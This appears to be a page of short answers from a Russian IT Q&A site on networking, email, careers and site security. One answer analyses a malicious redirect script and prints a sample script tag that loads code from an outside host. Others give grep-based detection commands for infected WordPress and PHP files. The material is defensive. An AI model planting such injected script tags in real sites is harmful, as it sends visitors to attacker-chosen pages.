Задать вопрос
  • Безопасно ли открывать код фронтенда?

    Zoominger
    @Zoominger
    System Integrator
    завоевать авторитет сообщества.

    Пхаха.

    акже команда боится, что злоумышленники разгадают нашу апишку и создадут миллион похожих сайтов.

    Расслабьтесь, всем на него плевать. Я серьёзно.

    асскажите, пожалуйста, какие могут быть проблемы с безопасностью, если опубликовать код фронтенда на Гитхабе.

    Если фронт кривой и с паролями доступа в самом коде, то, конечно, небезопасно. Если он нормальный и более-менее соблюдает принципы безопасности, то выкладывайте, таких мёртвых репозиториев - половина Гитхаба, ваш будет просто один из них.
    Ответ написан
    12 комментариев
  • Gigabit ethernet и POE?

    @Tabletko
    никого не трогаю, починяю примус
    Вас в гугле забанили?
    Ответ написан
    Комментировать
  • Что делать когда у тебя лагает на телефоне?

    gbg
    @gbg
    Любые ответы на любые вопросы
    Купите новый телефон.
    Ответ написан
    Комментировать
  • Есть ли актуальные курсы по хакингу для новичков?

    sergey-gornostaev
    @sergey-gornostaev
    Седой и строгий
    Курсы. По хакингу. Для новичков.

    5e7591afbfd94542739129.jpeg
    Это абсолютно несовместимое сочетание слов!

    Почитайте этот ответ и комментарии к нему. И этот ещё полезно будет.
    Ответ написан
    Комментировать
  • Есть ли актуальные курсы по хакингу для новичков?

    DevMan
    @DevMan
    на курсах далеко не уедешь: они рассказывают основы и давно прикрытые дыры.
    для хакинга нужны не курсы, а
    1 мозг (это самое ценное)
    2. знание сетевых протоколов
    3. знание целевой системы

    остальное: совершенствование своих навыков в выше перечисленном и постоянное чтение cve и их анализ.
    Ответ написан
    Комментировать
  • Почему не доходят письма по SMTP?

    mindtester
    @mindtester
    http://iczin.su/hexagram_48
    Ответ написан
    Комментировать
  • Почему не доходят письма по SMTP?

    akelsey
    @akelsey
    А по существу:
    PTR - отвратительный ip-176-192-239-59.bb.netbynet.ru
    SPF - отсутствует: *** No text (TXT) records available for trainzcity.myftp.org
    Ну т.е. домен абсолютно не подготовлен быть сервером отправки сообщений.
    Ответ написан
    Комментировать
  • Актуальные книги по wordpress?

    нет таких книг, есть wordpress codex
    Ответ написан
    Комментировать
  • Можно ли восстановить почту через Outlook.pst?

    Zoominger
    @Zoominger
    System Integrator
    Обычно да. Просто переносите и импортируете.
    Ответ написан
    Комментировать
  • Можно ли пойти сисадмину на инженера программиста?

    sergey-gornostaev
    @sergey-gornostaev
    Седой и строгий
    На инженера-программиста может пойти и обладатель кулинарного средне-специального образования. Или человек вообще без средне-специального образования.
    Ответ написан
    Комментировать
  • Что будет, если подключить свитч вместо роутера?

    Zoominger
    @Zoominger Куратор тега Компьютерные сети
    System Integrator
    Могу предположить, что IP получит только одно устройство, остальные пролетят.
    Ответ написан
    2 комментария
  • CTF. Что почитать?

    @dmshar
    Начните с университетского курса по ИБ. Реверсинжиниринг, анализ трафика, навыки программирования, аудит инфобезопасности и анализ защищенности, системное администрирование, криптоанализ, безопасность мобильных приложений.... Вот это и есть "основа основ". Разумеется, для того, что-бы участвовать в соревнованиях к этим основам надо существенно "добавить" всякого, чего можно поверх теории освоить исключительно из практики.
    Ответ написан
    Комментировать
  • Крик души. Что можно замутить на 1500$?

    @DDwrt100
    Ну конечно не циско , но какинибудь Dlink свичи можно вполне приобрести. Или еще что подешевле.
    Непонятно , что сейчас есть вообще из инфраструктуры.
    По почтовику , купить десктоп , развернуть Ubuntu , и какой нибудь Postfix. Работать будет, как то.
    Ответ написан
    1 комментарий
  • Как найти неисправность кабеля Ethernet (разрыв, плохой контакт ИТП)?

    CityCat4
    @CityCat4 Куратор тега Сетевое оборудование
    Жил да был черный кот за углом...
    Прошу не советовать сразу лан-тестер.

    Эт почему?

    Попробуй вот завязать глаза и на ощупь найти в незнакомой квартире дверь в туалет :) C какой-то по счету попытки наверное получится. Так и здесь - без тестера - как без глаз. Причем тестер должен быть не самый дишман, а такой, чтобы звонил каждый пин - потому что если обжимать скажем многожилку - недожать запросто. У меня был случай - прокладывал провод из комнаты в комнату. Прокладка сложная, по стенам, по потолку, через перегородку. Нет гигабита - и хоть ты тресни! Даже вопрос тут задавал, переобжимал несколько раз, провод похоже был некачественный. Вот именно тогда я понял, что лучше жабу удавить и купить-таки более менее приличный тестер.
    Ей-Богу, время сэкономит просто кучу. И еще большую кучу нервов.
    Ответ написан
    2 комментария
  • Что я должен сделать? Как решить проблему?

    CityCat4
    @CityCat4
    Жил да был черный кот за углом...
    Как правило, к провайдеру. Ну или если провайдер жиденький, к тому, кто админит обратную зону IP-адреса. Ошибка состоит в том, что записи PTR (которая определяет обратное преобразование имени в адрес) не существует (хотя обычно провайдеры генерят ничего не значащие бла-бла-бла записи).
    Ответ написан
    Комментировать
  • Что делает этот вирус?

    27cm
    @27cm
    TODO: Написать статус
    1. Функция checkOne() достаёт ключевые слова из тега <meta name="keywords" content="..." />
    2. Если ключевые слова не найдены, то скрипт берёт ключевые фразы из utm_term.
    3. Если ключевые фразы из utm_term не найдены, то используется title страницы.

    Найденные ключевые слова кодируются и отправляются в ktm-pohlenz.de/js/jquery.min.php. В результате вставляется JavaScript, который редиректит пользователя на URL адрес, максимально соответствующий найденным ключевым словам и HTTP referer страницы. Пример для этой страницы:
    <script type="text/javascript" src="http://ktm-pohlenz.de/js/jquery.min.php?c_utt=J18171&c_utm=http%3A%2F%2Fktm…IT%26se_referrer%3Dhttps%253A%252F%252Ftoster.ru%252F%26source%3Dtoster.ru"></script>


    P.S.: Редирект возвращается не всегда. Возможно на стороне ktm-pohlenz.de есть какая-то фильтрация по IP, UA, параметру c_utt и т. д.
    Ответ написан
    6 комментариев
  • Вирус или функция - uniplacer.php как убрать?

    @Amorchica Автор вопроса
    Сам отвечаю - перестало появляется
    Поискал все файлы на слово base64 заметил что в трех картинках есть это слово - удалил, перестало появлятся

    слово base64 само по себе не зло, в обычном php часто встречается, но в картинках его быть не должно

    теперь периодически ищю скриптом
    #!/bin/bash
    find . -iname '*.gif' -type f -print| xargs grep "base64" > result.txt
    find . -iname '*.jpeg' -type f -print| xargs grep "base64" >> result.txt
    find . -iname '*.jpg' -type f -print| xargs grep "base64" >> result.txt
    find . -iname '*.htm' -type f -print| xargs grep "base64" >> result.txt
    find . -iname '*.html' -type f -print| xargs grep "base64" >> result.txt
    find . -type f -print| xargs grep -i "uniplacer" >> result.txt
    Ответ написан
    Комментировать
  • Вирус постоянно меняет права к файлам сайта на Wordpress?

    irtek
    @irtek
    Wordpress-addicted
    У вас где-то залит shell-скрипт. В идеале нужно все переустановить.
    Wordpress в обязательном порядке, тему и все плагины. Если на сервере под одним пользователем несколько сайтов, то такой враг может быть в любом из них.

    Если у вас есть доступ к серверу по SSH, то выполните команду

    find . -type f -name '*.php' | xargs grep -l "x63" --color


    или

    find . -type f -name '*.php' | xargs grep -l "x47" --color


    "точка" после find обозначает искать в папке, в которой находитесь, замените ее на путь к папке, где лежат ваш сайт или сайты или вообще заменить на слеш / тогда искать будет по всему серверу.

    Команда ищет файлы в содержании, которых есть текст "x63" или "x47". В 99% случаях из таких кодов состоит шифровка вражеских вирусов. Обратите внимание на файлы, которые найдет команда. Откройте их и посмотрите содержание. Код вируса вы сразу увидите, он весь шифрованный base64 и присутствуют команды eval. Чистите или восстановите данные файлы на чистые.
    Ответ написан
    Комментировать
  • Zyxel USG40, иногда нагрузка ЦП доходит до 98%, в чем проблема?

    hint000
    @hint000
    у админа три руки
    Зря тут пишут, что телепаты в отпуске. :)
    Гляжу в хрустальный шар, и вижу у вас там VPN на ZyXEL'е, правильно?
    А потом гляжу сюда: https://habr.com/ru/company/zyxel/blog/428477/
    и вижу в комментариях:
    Традиционная тема — в даташитах указана одна производительность VPN, а в реальных условиях имеем в почти в 3 раза меньше. Иллюзион, практически. И замеры для даташита делаются для UDP (который, IMHO, для VPN-соединения только от житейской скуки использовать можно), и при определенной длине пакета. Предложения технической поддержки заставляют задуматься, не в параллельном ли мире живет она.
    P.S. Да-да, про USG60/USG310 речь.

    А потом еще смотрю в спецификации https://www.zyxel.com/ru/ru/products_services/Unif...
    и вижу, что USG40 почти в 2 раза слабее, чем USG60. А там в комментариях ругаются на низкую производительность USG60. Так что не удивляйтесь, так и должно быть.
    Ответ написан
    Комментировать